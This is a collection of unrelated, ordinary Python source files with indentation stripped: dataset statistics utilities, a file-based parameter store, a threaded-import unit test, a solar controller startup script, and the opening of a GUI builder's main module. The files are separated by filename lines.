ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
nl = len(l)
if nl:
assert l.shape[1] == 5, f'labels require 5 columns, {l.shape[1]} columns detected'
assert (l >= 0).all(), f'negative label values {l[l < 0]}'
assert (l[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {l[:, 1:][l[:, 1:] > 1]}'
_, i = np.unique(l, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
l = l[i] # remove duplicates
if segments:
segments = segments[i]
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarBatteryCapacity": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LastUpdateException": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_UpdateFailed": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.NamedTemporaryFile(mode="wb", prefix=".tmp", dir=params_path, delete=False)
with tmp_path as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
os.chmod(tmp_path.name, 0o666)
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path.name, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import os
import imp
import sys
import time
import shutil
import unittest
from test.support import verbose, import_module, run_unittest, TESTFN
thread = import_module('_thread')
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(thread.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_module()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = thread.allocate_lock()
def find_module(self, name, path=None):
# Simulate some thread-unsafe behaviour. If calls to find_module()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.1)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_module(self, name, path=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
def check_parallel_module_init(self):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
for i in range(N):
thread.start_new_thread(task, (N, done, done_tasks, errors,))
done.wait(60)
self.assertFalse(errors)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.append(finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_module('')
raise ImportError
sys.path_hooks.append(path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_module('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(sys.modules.pop, name, None)
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
def test_main():
run_unittest(ThreadedImportTests)
if __name__ == "__main__":
test_main()
|
startup_controller.py
|
#!/usr/bin/env python
import sys
import traceback
from threading import Thread, active_count
from time import sleep, time
from subprocess import call
from p3lib.conduit import Conduit
from ogsolar.libs.ogsolar_controller import OGSolarController
from ogsolar.libs.epsolar_tracer import EPSolarTracerInterface
from ogsolar.libs.yview_client import YViewClient
from ogsolar.libs.httpjsontranslator import HttpJsonTranslator
from ogsolar.libs.json_pusher import JsonPusher
from ogsolar.libs.app_config import AppConfig
from ogsolar.libs.web_server import WebServer
from ogsolar.libs.yview_client import AYTListener
class StartupController(object):
"""@brief Responsible for starting all the threads that compose the ogsolar system."""
MIN_RUNNING_THREAD_COUNT = 8
MAX_MEM_INCREASE_KB = 10000
REBOOT_CMD = "/sbin/reboot"
CONDUIT_READ_TIMEOUT_SECONDS = 30
@staticmethod
def RunThread(uio, method):
"""@brief Responsible for running a thread method and if it stops then report any exceptions."""
try:
method()
except:
traceback.print_exc(file=sys.stdout)
#Report the error so that it can be seen via syslog
uio.errorException()
uio.error("%s method exited." % ( str(method) ) )
def __init__(self, uio, options, appConfig):
"""@brief Constructor."""
self._uio = uio
self._options = options
self._appConfig = appConfig
def run(self):
conduitUIO = None
if self._options.debug:
conduitUIO = self._uio
self._traceConduit = Conduit(uio=conduitUIO, cName="tracer", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._epSolarTracerInterface = EPSolarTracerInterface(self._uio, self._options, self._appConfig, self._traceConduit)
epSolarTracerReaderThread = Thread(target=StartupController.RunThread, args=(self._uio, self._epSolarTracerInterface.run,) )
epSolarTracerReaderThread.setDaemon(True)
epSolarTracerReaderThread.start()
self._yViewConduit = Conduit(uio=conduitUIO, cName="yView", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._yViewClient = YViewClient(self._uio, self._options, self._appConfig, self._yViewConduit)
yViewClientThread = Thread(target=StartupController.RunThread, args=(self._uio, self._yViewClient.run,) )
yViewClientThread.setDaemon(True)
yViewClientThread.start()
self._webConduit = Conduit(uio=conduitUIO, cName="web", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._httpJsonTranslator = HttpJsonTranslator(self._uio, self._options, self._webConduit)
httpJsonTranslatorThread = Thread(target=StartupController.RunThread, args=(self._uio, self._httpJsonTranslator.run,) )
httpJsonTranslatorThread.setDaemon(True)
httpJsonTranslatorThread.start()
self._jsonPusherConduit = Conduit(uio=conduitUIO, cName="json", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._jsonPusher = JsonPusher(self._uio, self._options, self._jsonPusherConduit)
jsonPusherThread = Thread(target=StartupController.RunThread, args=(self._uio, self._jsonPusher.run,) )
jsonPusherThread.setDaemon(True)
jsonPusherThread.start()
webServerThread = WebServer(self._options.web_root)
webServerThread.setPort(AYTListener.WEB_SERVER_PORT)
webServerThread.setUIO(self._uio)
webServerThread.setDaemon(True)
webServerThread.start()
self._oGSolarController = OGSolarController(self._uio, self._options, self._appConfig, self._traceConduit, self._yViewConduit, self._webConduit, self._jsonPusherConduit)
#This thread has to shutdown in a controlled fashion and so is not a daemon thread.
oGSolarControllerThread = Thread(target=StartupController.RunThread, args=(self._uio, self._oGSolarController.run,) )
#oGSolarControllerThread.setDaemon(True)
oGSolarControllerThread.start()
#Block here
self._threadMonitor()
def _shutDown(self):
"""@brief Shutdown the solar controller system."""
rebootDelay = self._appConfig.getAttr(AppConfig.DELAY_BEFORE_ERROR_REBOOT)
self._uio.info("Starting shutdown.")
self._oGSolarController.shutDown()
self._uio.info("SHUTDOWN:")
if not self._options.no_reboot:
self._uio.info("SHUTDOWN: rebooting in %d seconds." % (rebootDelay) )
# Provide details on how long before restart, useful in syslog.
rebootTime=time()+rebootDelay
while time() < rebootTime:
self._uio.warn("%d seconds before reboot." % (rebootTime-time()) )
sleep(2)
self._reboot()
def _reboot(self):
"""@brief reboot the Linux platform."""
self._uio.info("REBOOT: NOW !!!")
call([StartupController.REBOOT_CMD])
def _threadMonitor(self, pollSeconds=5):
"""@brief Monitor all running threads and if one stops exit the main thread.
Exiting the main thread will shutdown all other threads as they are all daemon threads."""
#Sleep to allow all threads to start
sleep(pollSeconds)
threadCount = active_count()
self._uio.info("STARTUP: %d threads running" % (threadCount) )
initialMemUsedKB = OGSolarController.GetMemUsage()
try:
try:
while True:
memUsedKb = OGSolarController.GetMemUsage()
memIncreaseKB = memUsedKb-initialMemUsedKB
threadCount = active_count()
self._uio.info("%d threads running (min=%d)." % (threadCount, StartupController.MIN_RUNNING_THREAD_COUNT) )
self._uio.info("Memory in use = %d kB, increase since startup = %d kB (max = %d kB)." % (memUsedKb, memIncreaseKB, self._options.max_mem_inc) )
ctrlErrMsg = self._oGSolarController.getErrorMessage()
if threadCount < StartupController.MIN_RUNNING_THREAD_COUNT:
self._uio.error("THREAD ERROR: Not all threads are running.")
break
elif memIncreaseKB > self._options.max_mem_inc:
self._uio.error("MEMORY ERROR: To much memory is now being used.")
break
elif ctrlErrMsg:
self._uio.error("OGSOLAR_CONTROLLER: %s" % (ctrlErrMsg) )
break
else:
sleep(pollSeconds)
except KeyboardInterrupt:
self._uio.error("SHUTDOWN: User pressed CTRL C")
finally:
self._shutDown()
|
main.py
|
"""\
Main wxGlade module: defines wxGladeFrame which contains the buttons to add
widgets and initializes all the stuff (tree, frame_property, etc.)
@copyright: 2002-2007 Alberto Griggio
@copyright: 2011-2016 Carsten Grohmann
@copyright: 2016-2021 Dietmar Schwertberger
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
# import general python modules
import logging, os, os.path, sys, math, time, functools
import wx
from xml.sax import SAXParseException
# import project modules
import application
import common, config, compat, misc, history
import new_properties as np
import preferencesdialog, msgdialog, bugdialog, about
import log
import template
from tree import WidgetTree
from xml_parse import XmlWidgetBuilder, ProgressXmlWidgetBuilder, XmlParsingError
class FileDropTarget(wx.FileDropTarget):
# file drop target that checks first whether the property panel is the target
def __init__(self, parent):
wx.FileDropTarget.__init__(self)
self.parent = parent
if config.debugging:
def OnDragOver(self, x, y, defResult):
x0,y0 = self.parent.GetClientAreaOrigin()
screen_xy = self.parent.ClientToScreen( (x-x0,y-y0) )
ctrl = wx.FindWindowAtPoint( screen_xy )
print("DragOver", x0,y0, x-x0,y-y0, ctrl)
return wx.FileDropTarget.OnDragOver(self, x,y, defResult)
def OnDropFiles(self, x, y, filenames):
if len(filenames) > 1:
wx.MessageBox( _("Please only drop one file at a time"), "wxGlade", wx.ICON_ERROR )
return False
if not filenames or not os.path.exists(filenames[0]): return False
# find control under drop point; this does also work if a dialog is open
x0,y0 = self.parent.GetClientAreaOrigin()
screen_xy = self.parent.ClientToScreen( (x-x0,y-y0) )
ctrl = c = wx.FindWindowAtPoint( screen_xy )
# go up the hierarchy and find a widget with an 'on_drop_files' method
while c:
if hasattr(c, "on_drop_files"):
handled = c.on_drop_files(screen_xy, ctrl, filenames)
if handled: return True
if c is self.parent.property_panel: break
if isinstance(c, wx.Dialog): return False # when a dialog is open, don't open wxg or xrc files
c = c.GetParent()
# not handled by a control; try to open .wxg or .XRC file
if not self.parent.ask_save(): return False
path = filenames[0]
if os.path.splitext(path)[1].upper() == ".XRC":
self.parent.import_xrc(path, ask_save=False)
else:
self.parent._open_app(path)
self.parent.cur_dir = os.path.dirname(path)
return True
class wxGladePropertyPanel(wx.Panel):
"Panel used to display the Properties of the various widgets"
def __init__(self, parent):
wx.Panel.__init__( self, parent, -1, name='PropertyPanel' )
self.SetBackgroundColour( compat.wx_SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE) )
self.current_widget = None # instance currently being edited
self.next_widget = None # the next one, will only be edited after a small delay
self.pagenames = None
sizer = wx.BoxSizer(wx.VERTICAL)
self.heading = wx.TextCtrl(self, style=wx.TE_READONLY)
sizer.Add(self.heading, 0, wx.EXPAND, 0)
self.notebook = wx.Notebook(self)
self.notebook.Bind(wx.EVT_SIZE, self.on_notebook_size)
sizer.Add(self.notebook, 1, wx.EXPAND, 0)
# for GTK3: add a panel to determine page size
p = wx.Panel(self.notebook)
self.notebook.AddPage(p, "panel")
self._notebook_decoration_size = None
p.Bind(wx.EVT_SIZE, self.on_panel_size)
self.SetSizer(sizer)
self.Layout()
def on_drop_files(self, screen_xy, ctrl, filenames):
if not self.current_widget: return False
for p_name in self.current_widget.PROPERTIES:
if p_name[0].isupper(): continue
prop = self.current_widget.properties.get(p_name)
if not prop or not hasattr(prop, "on_drop_file"): continue
if ( hasattr(prop, "label_ctrl") and prop.label_ctrl.ScreenRect.Contains( screen_xy ) and
prop.label_ctrl.IsShownOnScreen() ) or prop.has_control(ctrl):
return prop.on_drop_file(filenames[0])
return False
####################################################################################################################
# new editor interface
def set_widget(self, widget, force=False):
if widget is self.current_widget and not force:
# just update
return
self.next_widget = widget
if self.current_widget:
# this might not be executed if there was an error during creation of the property editors
for editor in self.current_widget.properties.values():
editor.destroy_editor()
self.current_widget = None # delete the reference
wx.CallLater( 150, self.edit_properties, widget )
def edit_properties(self, edit_widget):
# this will be called with a delay
